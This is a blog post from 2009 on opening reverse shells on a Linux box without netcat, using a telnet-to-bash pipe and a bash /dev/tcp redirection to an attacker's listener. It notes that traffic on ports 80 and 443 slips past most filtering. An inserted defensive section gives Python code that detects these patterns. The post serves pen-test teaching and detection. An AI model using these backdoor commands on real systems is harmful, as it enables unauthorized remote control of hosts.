Monday, April 20, 2009

Backdoor without Netcat

So you want to get a remote shell on that box, but you either cannot install software for some reason or your rules of engagement state that this is out of scope. No problem! Here is a handy little trick using only built-in tools.

Start two netcat listeners on your Windows machine:

C:\> nc -l -p 80

C:\> nc -l -p 443

From your Linux box, run the following command, which opens the backdoor:

telnet [Windows Box IP] 80 | /bin/bash | telnet [Windows Box IP] 443

The interesting thing here is that everything you type in the port 80 window is executed by bash, and the results show up in the port 443 window. You now have a remote shell to that Linux box. Probably the nicest thing about this one is that the Linux box only makes two outbound connections to the Internet, to port 80 and port 443, and outbound traffic to those ports is allowed in most cases. Unless there is an IDS/IPS in place, this should skirt right under the radar.

Now if you are on a Linux box whose bash has good ol' /dev/tcp support, here is another way to do this:

On your Windows box start a netcat listener:

C:\> nc -l -p 80

Then on your Linux box run the following:

/bin/bash -i > /dev/tcp/[Windows Box IP]/80 0<&1 2>&1


Let's break this down. The -i after bash tells it to run in interactive mode. The > sends the shell's Standard Output (1) to the /dev/tcp connection. Next, 0<&1 makes Standard Input (0) a duplicate (&) of Standard Output (1), so the shell reads its commands from that same connection. Finally, 2>&1 redirects (>) Standard Error (2) into a duplicate (&) of Standard Output (1), so error messages travel over the connection too.

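From the blue-team side, both of these netcat-free shells leave the same two footprints: a command line that pipes a network client into a shell or redirects a shell into /dev/tcp, and (for the /dev/tcp variant) a shell process whose standard input, output and error are all network sockets. The following detection helper is an added example, not code from the original post or from SANS; the sample command lines and file-descriptor maps it checks are constructed for the example, and the /proc walk assumes a Linux host:

```python
"""Detect the telnet-pipe and /dev/tcp reverse-shell patterns from a defender's side.

Added example (not the blog's own code). Two independent checks:
  1. classify_command(): inspect a command line (auditd EXECVE record, shell
     history, EDR process-creation feed) for the /dev/tcp redirection or a
     network client piped straight into a shell.
  2. stdio_on_socket() / scan_proc(): on Linux, flag a shell whose fds 0, 1
     and 2 all resolve to sockets, which is exactly what
     "bash -i > /dev/tcp/... 0<&1 2>&1" produces whatever the exact command.
"""
import os
import re
import shlex
from typing import Dict, List

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
NET_CLIENTS = {"telnet"}

# /dev/tcp/<host>/<port> or /dev/udp/<host>/<port> used as a redirection target
DEV_TCP_RE = re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+")


def classify_command(cmdline: str) -> List[str]:
    """Return the reasons a command line looks like a netcat-free reverse shell
    (empty list when it looks benign)."""
    reasons = []
    if DEV_TCP_RE.search(cmdline):
        reasons.append("shell /dev/tcp redirection")
    # Split the pipeline and look for <network client> | <shell>.
    stages = [s.strip() for s in cmdline.split("|")]
    for left, right in zip(stages, stages[1:]):
        try:
            left_prog = os.path.basename(shlex.split(left)[0])
            right_prog = os.path.basename(shlex.split(right)[0])
        except (ValueError, IndexError):
            continue  # unparsable or empty stage, skip it
        if left_prog in NET_CLIENTS and right_prog in SHELLS:
            reasons.append("network client piped into a shell")
    return reasons


def stdio_on_socket(fd_targets: Dict[int, str]) -> bool:
    """True when fds 0, 1 and 2 all point at sockets, in the form
    readlink(/proc/<pid>/fd/N) reports them (e.g. 'socket:[4242]')."""
    return all(fd_targets.get(fd, "").startswith("socket:[") for fd in (0, 1, 2))


def scan_proc() -> List[int]:
    """Walk /proc (Linux only) and return pids of shells whose stdio are all sockets.
    Returns an empty list on systems without /proc."""
    hits = []
    if not os.path.isdir("/proc"):
        return hits
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            if comm not in SHELLS:
                continue
            targets = {fd: os.readlink(f"/proc/{pid}/fd/{fd}") for fd in (0, 1, 2)}
        except OSError:
            continue  # process exited or we lack permission
        if stdio_on_socket(targets):
            hits.append(int(pid))
    return hits


# Constructed sample command lines, not taken from any real system.
SAMPLE_COMMANDS = [
    "telnet 203.0.113.10 80 | /bin/bash | telnet 203.0.113.10 443",
    "/bin/bash -i > /dev/tcp/203.0.113.10/80 0<&1 2>&1",
    "cat /var/log/syslog | grep -i error",
    "ssh admin@203.0.113.10",
]


def scan_commands(cmds: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious command line to the reasons it was flagged."""
    return {c: classify_command(c) for c in cmds if classify_command(c)}


if __name__ == "__main__":
    for cmd, why in scan_commands(SAMPLE_COMMANDS).items():
        print(f"FLAG {why}: {cmd}")
    print("shells with socket stdio:", scan_proc())
```

The command-line check catches both variants; the file-descriptor check only catches the /dev/tcp one, because in the telnet pipeline the shell's stdio are pipes and the sockets belong to the two telnet processes. Egress filtering that does not blindly trust ports 80 and 443 and proxy enforcement for web traffic remove the "skirt under the radar" property that the post relies on.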

OK so that's some kick butt command line kung fu-rey. This is just one of the really nice things about taking a class at SANS. Ed Skoudis and John Strand are very good instructors (I don't mean to leave out the others. I'm sure they are good as well, I just haven't had the pleasure of taking a class from them yet). These alternate techniques came out of a challenge session between a few of the SANS instructors. They basically challenged each other: "What if you don't have netcat in your pen test?" These are some of the answers that came out. We did a lot more than this. We saw how to do port scans with /dev/tcp, telnet and ftp! Yes, ftp! All of this without installing software on the target box.

Personally, I prefer not to install software if possible. I do think the clients you are pen testing would love to hear "we don't install malware or tools on your box unless completely necessary to gain access". I can just imagine them getting the warm fuzzies from this.

If you have any cool little tricks like this to share, please comment! If you like this command line stuff, you can also browse on over to the Commandline KungFu blog, where you will see these challenges that Ed Skoudis and others partake in. I have learned a bunch from this blog, not only for pen testing, but for making system administration easier too!
